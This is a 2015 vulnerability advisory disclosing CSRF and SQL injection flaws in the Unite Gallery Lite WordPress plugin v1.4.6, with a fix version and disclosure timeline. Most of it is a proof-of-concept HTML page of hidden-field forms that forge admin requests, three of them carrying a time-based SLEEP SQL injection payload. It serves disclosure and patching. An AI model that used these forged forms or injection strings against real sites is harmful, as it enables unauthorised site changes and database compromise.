WordPress Unite Gallery Lite 1.4.6 CSRF / SQL Injection

2015-07-26T00:00:00
ID PACKETSTORM:132842
Type packetstorm
Reporter Nitin Venkatesh
Modified 2015-07-26T00:00:00

Description

                                        
                                            `# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in  
Unite Gallery Lite Wordpress Plugin v1.4.6  
# Submitter: Nitin Venkatesh  
# Product: Unite Gallery Lite Wordpress Plugin  
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/  
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper  
Neutralization of Special Elements used in an SQL Command ('SQL  
Injection')[CWE-89]  
# Affected Versions: v1.4.6 and possibly below.  
# Tested versions: v1.4.6  
# Fixed Version: v1.5  
# Link to code diff:  
https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite  
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/  
# CVE Status: New & Unassigned  
  
## Product Information:  
  
The Unite Gallery is all in one image and video gallery for WordPress.  
  
## Vulnerability Description:  
  
The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible  
to CSRF. Additionally, the following parameters were found to be  
susceptible to SQLi -  
  
Form submitted to /wp-admin/admin-ajax.php:  
- data[galleryID]  
  
Form submitted to /wp-admin/admin.php:  
- galleryid  
- id  
  
## Proof of Concept:  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>  
</head>  
<body>  
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>  
<p>CSRF - Create Gallery</p>  
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='create_gallery' />  
<input type="hidden" name="gallery_type" value='ug-carousel' />  
<input type="hidden" name="data[main][title]" value='test 2' />  
<input type="hidden" name="data[main][alias]" value='test2' />  
<input type="hidden" name="data[main][category]" value='new' />  
<input type="hidden" name="data[main][full_width]" value='true' />  
<input type="hidden" name="data[main][gallery_width]" value='1000' />  
<input type="submit" value="submit" />  
</form>  
  
<p>CSRF + SQLi - Update Gallery</p>  
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='update_gallery' />  
<input type="hidden" name="gallery_type" value='ug-carousel' />  
<input type="hidden" name="data[main][title]" value='test 2' />  
<input type="hidden" name="data[main][alias]" value='test2' />  
<input type="hidden" name="data[main][shortcode]" value='[unitegallery  
test2]' />  
<input type="hidden" name="data[main][category]" value='3' />  
<input type="hidden" name="data[main][full_width]" value='true' />  
<input type="hidden" name="data[main][gallery_width]" value='1000' />  
<input type="hidden" name="data[main][gallery_min_width]" value='150' />  
<input type="hidden" name="data[params][tile_width]" value='160' />  
<input type="hidden" name="data[params][tile_height]" value='160' />  
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />  
<input type="hidden" name="data[params][theme_carousel_align]"  
value='center' />  
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />  
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />  
<input type="hidden" name="data[params][tile_image_resolution]"  
value='medium' />  
<input type="hidden" name="data[params][carousel_padding]" value='8' />  
<input type="hidden" name="data[params][carousel_space_between_tiles]"  
value='20' />  
<input type="hidden" name="data[params][carousel_scroll_duration]"  
value='500' />  
<input type="hidden" name="data[params][carousel_scroll_easing]"  
value='easeOutCubic' />  
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />  
<input type="hidden" name="data[params][carousel_autoplay_timeout]"  
value='3000' />  
<input type="hidden" name="data[params][carousel_autoplay_direction]"  
value='right' />  
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"  
value='true' />  
<input type="hidden" name="data[params][theme_enable_navigation]"  
value='true' />  
<input type="hidden" name="data[params][theme_navigation_enable_play]"  
value='true' />  
<input type="hidden" name="data[params][theme_navigation_align]"  
value='center' />  
<input type="hidden" name="data[params][theme_navigation_offset_hor]"  
value='0' />  
<input type="hidden" name="data[params][theme_navigation_position]"  
value='bottom' />  
<input type="hidden" name="data[params][theme_navigation_margin]"  
value='20' />  
<input type="hidden" name="data[params][theme_space_between_arrows]"  
value='5' />  
<input type="hidden" name="data[params][carousel_navigation_numtiles]"  
value='3' />  
<input type="hidden" name="data[params][position]" value='center' />  
<input type="hidden" name="data[params][margin_top]" value='0' />  
<input type="hidden" name="data[params][margin_bottom]" value='0' />  
<input type="hidden" name="data[params][margin_left]" value='0' />  
<input type="hidden" name="data[params][margin_right]" value='0' />  
<input type="hidden" name="data[params][tile_enable_action]" value='true' />  
<input type="hidden" name="data[params][tile_as_link]" value='false' />  
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />  
<input type="hidden" name="data[params][tile_enable_border]" value='true' />  
<input type="hidden" name="data[params][tile_border_width]" value='3' />  
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'  
/>  
<input type="hidden" name="data[params][tile_border_radius]" value='0' />  
<input type="hidden" name="data[params][tile_enable_outline]" value='true'  
/>  
<input type="hidden" name="data[params][tile_outline_color]"  
value='#8b8b8b' />  
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'  
/>  
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />  
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />  
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />  
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />  
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'  
/>  
<input type="hidden" name="data[params][tile_enable_image_effect]"  
value='false' />  
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'  
/>  
<input type="hidden" name="data[params][tile_image_effect_reverse]"  
value='false' />  
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'  
/>  
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'  
/>  
<input type="hidden" name="data[params][tile_overlay_color]"  
value='#000000' />  
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />  
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'  
/>  
<input type="hidden" name="data[params][tile_space_between_icons]"  
value='26' />  
<input type="hidden" name="data[params][tile_enable_textpanel]"  
value='false' />  
<input type="hidden" name="data[params][tile_textpanel_source]"  
value='title' />  
<input type="hidden" name="data[params][tile_textpanel_always_on]"  
value='false' />  
<input type="hidden" name="data[params][tile_textpanel_appear_type]"  
value='slide' />  
<input type="hidden" name="data[params][tile_textpanel_padding_top]"  
value='8' />  
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"  
value='8' />  
<input type="hidden" name="data[params][tile_textpanel_padding_left]"  
value='11' />  
<input type="hidden" name="data[params][tile_textpanel_padding_right]"  
value='11' />  
<input type="hidden" name="data[params][tile_textpanel_bg_color]"  
value='#000000' />  
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"  
value='0.6' />  
<input type="hidden" name="data[params][tile_textpanel_title_color]"  
value='#ffffff' />  
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"  
value='left' />  
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"  
value='14' />  
<input type="hidden" name="data[params][tile_textpanel_title_bold]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_type]" value='wide' />  
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"  
value='true' />  
<input type="hidden" name="data[params][gallery_mousewheel_role]"  
value='zoom' />  
<input type="hidden" name="data[params][lightbox_overlay_opacity]"  
value='1' />  
<input type="hidden" name="data[params][lightbox_overlay_color]"  
value='#000000' />  
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"  
value='0.4' />  
<input type="hidden" name="data[params][lightbox_show_numbers]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'  
/>  
<input type="hidden" name="data[params][lightbox_numbers_color]"  
value='#e5e5e5' />  
<input type="hidden" name="data[params][lightbox_show_textpanel]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_textpanel_width]"  
value='550' />  
<input type="hidden" name="data[params][lightbox_textpanel_source]"  
value='title' />  
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"  
value='#e5e5e5' />  
<input type="hidden"  
name="data[params][lightbox_textpanel_title_text_align]" value='left' />  
<input type="hidden"  
name="data[params][lightbox_textpanel_title_font_size]" value='14' />  
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"  
value='false' />  
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"  
value='0.6' />  
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"  
value='#000000' />  
<input type="hidden" name="data[params][lightbox_arrows_position]"  
value='sides' />  
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"  
value='false' />  
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"  
value='14' />  
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"  
value='#e5e5e5' />  
<input type="hidden"  
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />  
<input type="hidden"  
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />  
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"  
value='true' />  
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"  
value='title' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />  
<input type="hidden"  
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border]" value='true' />  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border_width]" value='10'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border_color]"  
value='#ffffff' />  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'  
/>  
<input type="hidden"  
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />  
<input type="hidden" name="data[params][include_jquery]" value='true' />  
<input type="hidden" name="data[params][js_to_body]" value='false' />  
<input type="hidden" name="data[params][compress_output]" value='false' />  
<input type="hidden" name="data[params][gallery_debug_errors]"  
value='false' />  
  
<!-- SQLi -->  
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM  
(SELECT(SLEEP(5)))rock)' />  
<input type="submit" value="submit" />  
</form>  
  
<p>CSRF - Add Items</p>  
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='add_item' />  
<input type="hidden" name="gallery_type" value='' />  
<input type="hidden" name="data[type]" value='html5video' />  
<input type="hidden" name="data[title]" value='test' />  
<input type="hidden" name="data[description]" value='' />  
<input type="hidden" name="data[urlImage]" value='' />  
<input type="hidden" name="data[urlThumb]" value='' />  
<input type="hidden" name="data[urlVideo_mp4]" value='  
http://video-js.zencoder.com/oceans-clip.mp4' />  
<input type="hidden" name="data[urlVideo_webm]" value='  
http://video-js.zencoder.com/oceans-clip.webm' />  
<input type="hidden" name="data[urlVideo_ogv]" value='  
http://video-js.zencoder.com/oceans-clip.ogv' />  
<input type="hidden" name="data[catID]" value='4' />  
<input type="submit" value="submit" />  
</form>  
  
<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>  
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">  
<input type="hidden" name="action" value='unitegallery_ajax_action' />  
<input type="hidden" name="client_action" value='get_cat_items' />  
<input type="hidden" name="gallery_type" value='ug-carousel' />  
<input type="hidden" name="data[catID]" value='3' />  
  
<!-- SQLi -->  
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM  
(SELECT(SLEEP(5)))rock)' />  
<input type="submit" value="submit" />  
</form>  
  
<p> CSRF + SQLi - Action buttons</p>  
<ul>  
<li>  
<a href="  
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
">  
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
</a></li>  
<li>  
<a href="  
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
">  
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)  
</a>  
</li>  
</ul>  
</body>  
</html>  
  
## Solution:  
  
Upgrade to v1.5 or higher  
  
## Disclosure Timeline:  
  
2015-06-06 - Discovered. Reported to developer.  
2015-06-10 - Updated version released.  
2015-07-25 - Publishing disclosure on FD mailing list  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  
  
`